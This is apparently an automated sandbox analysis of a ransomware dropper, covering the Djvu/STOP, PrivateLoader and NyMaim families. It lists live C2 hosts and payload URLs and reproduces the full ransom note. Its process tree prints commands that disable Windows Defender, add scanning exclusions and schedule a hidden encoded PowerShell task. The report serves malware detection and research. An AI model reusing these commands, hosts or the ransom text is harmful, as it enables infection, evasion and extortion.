djvu | f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b

Analysis

max time kernel
46s
max time network
154s
platform
windows10-2004_x64
resource
win10v2004-20220721-en
resource tags

arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system
submitted
04-08-2022 15:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Service.exe
Size

400KB
MD5

9519c85c644869f182927d93e8e25a33
SHA1

eadc9026e041f7013056f80e068ecf95940ea060
SHA256

f0dc8fa1a18901ac46f4448e434c3885a456865a3a309840a1c4ac67fd56895b
SHA512

dcc1dd25bba19aaf75ec4a1a69dc215eb519e9ee3b8f7b1bd16164b736b3aa81389c076ed4e8a17a1cbfaec2e0b3155df039d1bca3c7186cfeb9950369bccf23

Score

10^/10

djvu nymaim privateloader discovery evasion loader main persistence ransomware spyware stealer trojan vmprotect

Malware Config

Extracted

Family

privateloader

http://163.123.143.4/proxies.txt

http://107.182.129.251/server.txt

pastebin.com/raw/A7dSG1te

http://wfsdragon.ru/api/setStats.php

163.123.143.12

http://91.241.19.125/pub.php?pub=one

http://sarfoods.com/index.php

Attributes

payload_url
https://cdn.discordapp.com/attachments/1003879548242374749/1003976870611669043/NiceProcessX64.bmp
https://cdn.discordapp.com/attachments/1003879548242374749/1003976754358124554/NiceProcessX32.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931507465563045909/dingo_20220114120058.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://193.56.146.76/Proxytest.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://privacy-tools-for-you-780.com/downloads/toolspab3.exe
http://luminati-china.xyz/aman/casper2.exe
https://innovicservice.net/assets/vendor/counterup/RobCleanerInstlr95038215.exe
http://tg8.cllgxx.com/hp8/g1/yrpp1047.exe
https://cdn.discordapp.com/attachments/910842184708792331/930849718240698368/Roll.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930850766787330068/real1201.bmp
https://cdn.discordapp.com/attachments/910842184708792331/930882959131693096/Installer.bmp
http://185.215.113.208/ferrari.exe
https://cdn.discordapp.com/attachments/910842184708792331/931233371110141962/LingeringsAntiphon.bmp
https://cdn.discordapp.com/attachments/910842184708792331/931285223709225071/russ.bmp
https://cdn.discordapp.com/attachments/910842184708792331/932720393201016842/filinnn.bmp
https://cdn.discordapp.com/attachments/910842184708792331/933436611427979305/build20k.bmp
https://c.xyzgamec.com/userdown/2202/random.exe
http://mnbuiy.pw/adsli/note8876.exe
http://www.yzsyjyjh.com/askhelp23/askinstall23.exe
http://luminati-china.xyz/aman/casper2.exe
https://suprimax.vet.br/css/fonts/OneCleanerInst942914.exe
http://tg8.cllgxx.com/hp8/g1/ssaa1047.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_64_bit_4.3.0_Setup.exe
https://www.deezloader.app/files/Deezloader_Remix_Installer_32_bit_4.3.0_Setup.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516400005296219/anyname.exe
https://cdn.discordapp.com/attachments/910281601559167006/911516894660530226/PBsecond.exe
https://cdn.discordapp.com/attachments/910842184708792331/914047763304550410/Xpadder.bmp
http://185.215.113.208/ferrari4.exe

Extracted

Family

nymaim

208.67.104.9

212.192.241.16

Extracted

Family

djvu

http://acacaca.org/test2/get.php

Attributes

extension
.vvyu
offline_id
rE5LpDv2ftYRXAo7bC18EpzfRMTHSGjgfyIMfZt1
payload_url
http://rgyui.top/dl/build2.exe
http://acacaca.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-QsoSRIeAK6 Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@bestyourmail.ch Reserve e-mail address to contact us: datarestorehelp@airmail.cc Your personal ID: 0531Jhyjd

rsa_pubkey.plain

Signatures

Detected Djvu ransomware 11 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2568-194-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3716-196-0x0000000002260000-0x000000000237B000-memory.dmp	family_djvu
behavioral2/memory/2568-197-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2568-199-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2568-189-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2568-244-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/2568-286-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5372-299-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5372-303-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5372-305-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/5372-333-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu

Modifies Windows Defender Real-time Protection settings 3 TTPs 7 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

MeXmZemsbyWGZW8yKKiQjIiN.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification = "1"	MeXmZemsbyWGZW8yKKiQjIiN.exe

NyMaim
NyMaim is a malware with various capabilities written in C++ and first seen in 2013.
trojan nymaim
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
loader privateloader
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.

Processes:

rundll32.exe

description pid pid_target process target process

Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2272 2668 rundll32.exe

description	pid	pid_target	process	target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2272	2668	rundll32.exe

Blocklisted process makes network request 15 IoCs

Processes:

schtasks.exe

flow	pid	process
83	2576	schtasks.exe
91	2576	schtasks.exe
92	2576	schtasks.exe
93	2576	schtasks.exe
94	2576	schtasks.exe
95	2576	schtasks.exe
96	2576	schtasks.exe
99	2576	schtasks.exe
100	2576	schtasks.exe
101	2576	schtasks.exe
102	2576	schtasks.exe
108	2576	schtasks.exe
109	2576	schtasks.exe
111	2576	schtasks.exe
112	2576	schtasks.exe

Downloads MZ/PE file

Executes dropped EXE 11 IoCs

Processes:

MeXmZemsbyWGZW8yKKiQjIiN.exeNiceProcessX64.bmp.exemixinte04.bmp.exeddoAKFf.exe.exeyare1095.exe.exeWEFdanE.exe.exeutube.bmp.exebuild.exe.exesetup331.exe.exeAdblockInstaller.exe.exeB2BCH2.exe.exe

pid	process
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
4584	NiceProcessX64.bmp.exe
4048	mixinte04.bmp.exe
1364	ddoAKFf.exe.exe
2732	yare1095.exe.exe
4024	WEFdanE.exe.exe
4756	utube.bmp.exe
3716	build.exe.exe
3208	setup331.exe.exe
1756	AdblockInstaller.exe.exe
4224	B2BCH2.exe.exe

Modifies Windows Firewall 1 TTPs 1 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exe

pid process

1512 netsh.exe

pid	process
1512	netsh.exe

VMProtect packed file 4 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe	vmprotect
C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe	vmprotect
behavioral2/memory/2732-163-0x0000000140000000-0x000000014067E000-memory.dmp	vmprotect
behavioral2/memory/2072-326-0x0000000140000000-0x0000000140684000-memory.dmp	vmprotect

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Service.exeMeXmZemsbyWGZW8yKKiQjIiN.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	Service.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation	MeXmZemsbyWGZW8yKKiQjIiN.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

icacls.exe

pid process

4772 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4772	icacls.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

WEFdanE.exe.exeddoAKFf.exe.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	WEFdanE.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	WEFdanE.exe.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	ddoAKFf.exe.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	ddoAKFf.exe.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 9 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

114 ip-api.com
189 api.2ip.ua
16 ipinfo.io
33 ipinfo.io
126 api.2ip.ua
188 api.2ip.ua
271 ip-api.com
15 ipinfo.io
124 api.2ip.ua

flow	ioc
114	ip-api.com
189	api.2ip.ua
16	ipinfo.io
33	ipinfo.io
126	api.2ip.ua
188	api.2ip.ua
271	ip-api.com
15	ipinfo.io
124	api.2ip.ua

Drops file in Program Files directory 2 IoCs

Processes:

Service.exe

description	ioc	process
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	Service.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
2216	2732	WerFault.exe	yare1095.exe.exe
4440	4048	WerFault.exe	mixinte04.bmp.exe
4872	5676	WerFault.exe	gcleaner.exe
2328	2072	WerFault.exe	rmaa1045.exe
724	1836	WerFault.exe	rundll32.exe

Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

6092 schtasks.exe
2312 schtasks.exe
2820 schtasks.exe
4060 schtasks.exe
2292 schtasks.exe
2332 schtasks.exe
Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exe

pid process

3600 tasklist.exe
2604 tasklist.exe
Kills process with taskkill 3 IoCs
evasion

Processes:

taskkill.exetaskkill.exetaskkill.exe

pid process

4888 taskkill.exe
4168 taskkill.exe
5656 taskkill.exe
Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3460 reg.exe
Runs ping.exe 1 TTPs 2 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXE

pid process

4672 PING.EXE
5532 PING.EXE

pid	process
6092	schtasks.exe
2312	schtasks.exe
2820	schtasks.exe
4060	schtasks.exe
2292	schtasks.exe
2332	schtasks.exe

pid	process
3600	tasklist.exe
2604	tasklist.exe

pid	process
4888	taskkill.exe
4168	taskkill.exe
5656	taskkill.exe

pid	process
3460	reg.exe

pid	process
4672	PING.EXE
5532	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

MeXmZemsbyWGZW8yKKiQjIiN.exeNiceProcessX64.bmp.exe

pid	process
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
2576	MeXmZemsbyWGZW8yKKiQjIiN.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe
4584	NiceProcessX64.bmp.exe

Suspicious use of WriteProcessMemory 43 IoCs

Processes:

Service.exeMeXmZemsbyWGZW8yKKiQjIiN.exeschtasks.exeWEFdanE.exe.exeddoAKFf.exe.exe

description	pid	process	target process
PID 5012 wrote to memory of 2576	5012	Service.exe	MeXmZemsbyWGZW8yKKiQjIiN.exe
PID 5012 wrote to memory of 2576	5012	Service.exe	MeXmZemsbyWGZW8yKKiQjIiN.exe
PID 5012 wrote to memory of 2576	5012	Service.exe	MeXmZemsbyWGZW8yKKiQjIiN.exe
PID 5012 wrote to memory of 4060	5012	Service.exe	schtasks.exe
PID 5012 wrote to memory of 4060	5012	Service.exe	schtasks.exe
PID 5012 wrote to memory of 4060	5012	Service.exe	schtasks.exe
PID 5012 wrote to memory of 2292	5012	Service.exe	schtasks.exe
PID 5012 wrote to memory of 2292	5012	Service.exe	schtasks.exe
PID 5012 wrote to memory of 2292	5012	Service.exe	schtasks.exe
PID 2576 wrote to memory of 4584	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	NiceProcessX64.bmp.exe
PID 2576 wrote to memory of 4584	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	NiceProcessX64.bmp.exe
PID 2576 wrote to memory of 4048	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	mixinte04.bmp.exe
PID 2576 wrote to memory of 4048	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	mixinte04.bmp.exe
PID 2576 wrote to memory of 4048	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	mixinte04.bmp.exe
PID 2576 wrote to memory of 1364	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	ddoAKFf.exe.exe
PID 2576 wrote to memory of 1364	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	ddoAKFf.exe.exe
PID 2576 wrote to memory of 1364	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	ddoAKFf.exe.exe
PID 2576 wrote to memory of 2732	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	yare1095.exe.exe
PID 2576 wrote to memory of 2732	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	yare1095.exe.exe
PID 2576 wrote to memory of 4024	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	WEFdanE.exe.exe
PID 2576 wrote to memory of 4024	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	WEFdanE.exe.exe
PID 2576 wrote to memory of 4024	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	WEFdanE.exe.exe
PID 2576 wrote to memory of 4756	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	utube.bmp.exe
PID 2576 wrote to memory of 4756	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	utube.bmp.exe
PID 2576 wrote to memory of 4756	2576	MeXmZemsbyWGZW8yKKiQjIiN.exe	utube.bmp.exe
PID 2576 wrote to memory of 3716	2576	schtasks.exe	build.exe.exe
PID 2576 wrote to memory of 3716	2576	schtasks.exe	build.exe.exe
PID 2576 wrote to memory of 3716	2576	schtasks.exe	build.exe.exe
PID 2576 wrote to memory of 3208	2576	schtasks.exe	setup331.exe.exe
PID 2576 wrote to memory of 3208	2576	schtasks.exe	setup331.exe.exe
PID 2576 wrote to memory of 3208	2576	schtasks.exe	setup331.exe.exe
PID 4024 wrote to memory of 1500	4024	WEFdanE.exe.exe	where.exe
PID 4024 wrote to memory of 1500	4024	WEFdanE.exe.exe	where.exe
PID 4024 wrote to memory of 1500	4024	WEFdanE.exe.exe	where.exe
PID 1364 wrote to memory of 1532	1364	ddoAKFf.exe.exe	where.exe
PID 1364 wrote to memory of 1532	1364	ddoAKFf.exe.exe	where.exe
PID 1364 wrote to memory of 1532	1364	ddoAKFf.exe.exe	where.exe
PID 2576 wrote to memory of 1756	2576	schtasks.exe	AdblockInstaller.exe.exe
PID 2576 wrote to memory of 1756	2576	schtasks.exe	AdblockInstaller.exe.exe
PID 2576 wrote to memory of 1756	2576	schtasks.exe	AdblockInstaller.exe.exe
PID 2576 wrote to memory of 4224	2576	schtasks.exe	B2BCH2.exe.exe
PID 2576 wrote to memory of 4224	2576	schtasks.exe	B2BCH2.exe.exe
PID 2576 wrote to memory of 4224	2576	schtasks.exe	B2BCH2.exe.exe

C:\Users\Admin\AppData\Local\Temp\Service.exe
"C:\Users\Admin\AppData\Local\Temp\Service.exe"
1⤵
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:5012

C:\Users\Admin\Documents\MeXmZemsbyWGZW8yKKiQjIiN.exe
"C:\Users\Admin\Documents\MeXmZemsbyWGZW8yKKiQjIiN.exe"
2⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2576

C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\NiceProcessX64.bmp.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:4584

C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\ddoAKFf.exe.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:1364

C:\Windows\SysWOW64\where.exe
where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
4⤵
PID:1532

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Calore.sldm & ping -n 5 localhost
4⤵
PID:4784

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:1420

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:3600

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:3020

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^DSFRIKxgXaTKtMXZByrebjRJrDwrxjAhOWIxSGWRcDMpumUWppHSeWRsqWOyIdTLSGVitCiVojGUmHDEJyUkEHlStdzWSRotKwsm$" Avvenne.sldm
6⤵
PID:3948

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Marito.exe.pif
Marito.exe.pif x
6⤵
PID:4536

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:4672

C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe"
3⤵
- Executes dropped EXE
PID:4048

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "mixinte04.bmp.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\mixinte04.bmp.exe" & exit
4⤵
PID:4544

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "mixinte04.bmp.exe" /f
5⤵
- Kills process with taskkill
PID:4168

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 492
4⤵
- Program crash
PID:4440

C:\Users\Admin\Pictures\Adobe Films\WEFdanE.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\WEFdanE.exe.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4024

C:\Windows\SysWOW64\where.exe
where kkskak993jhfkhjskhdfuhuiwyeuiry789q23489yhkjhsdf /?
4⤵
PID:1500

C:\Windows\SysWOW64\cmd.exe
cmd /c cmd < Nell.vst & ping -n 5 localhost
4⤵
PID:3548

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:5532

C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\yare1095.exe.exe"
3⤵
- Executes dropped EXE
PID:2732

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2732 -s 696
4⤵
- Program crash
PID:2216

C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe
"C:\Users\Admin\Pictures\Adobe Films\utube.bmp.exe"
3⤵
- Executes dropped EXE
PID:4756

C:\Users\Admin\AppData\Local\Temp\7zS59F7.tmp\Install.exe
.\Install.exe
4⤵
PID:3656

C:\Users\Admin\AppData\Local\Temp\7zS7649.tmp\Install.exe
.\Install.exe /S /site_id "525403"
5⤵
PID:1980

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
6⤵
PID:4740

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
7⤵
PID:4196

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
8⤵
PID:4216

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
8⤵
PID:4872

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
6⤵
PID:2848

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
7⤵
PID:3492

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
8⤵
PID:4636

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
8⤵
PID:4524

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gLvwXqanL" /SC once /ST 14:15:24 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
6⤵
- Creates scheduled task(s)
PID:2332

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gLvwXqanL"
6⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2576

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gLvwXqanL"
6⤵
PID:5240

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bsAbafpwyZvVmVDlMF" /SC once /ST 15:20:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\BInNSjlobDuvYZgQA\dWABRBnWrovPiXF\BSPprLq.exe\" Yz /site_id 525403 /S" /V1 /F
6⤵
- Creates scheduled task(s)
PID:6092

C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\build.exe.exe"
3⤵
- Executes dropped EXE
PID:3716

C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\build.exe.exe"
4⤵
PID:2568

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Local\7f012fdb-5b56-4515-b1ca-df1f5699dc2f" /deny *S-1-1-0:(OI)(CI)(DE,DC)
5⤵
- Modifies file permissions
PID:4772

C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\build.exe.exe" --Admin IsNotAutoStart IsNotTask
5⤵
PID:4612

C:\Users\Admin\Pictures\Adobe Films\build.exe.exe
"C:\Users\Admin\Pictures\Adobe Films\build.exe.exe" --Admin IsNotAutoStart IsNotTask
6⤵
PID:5372

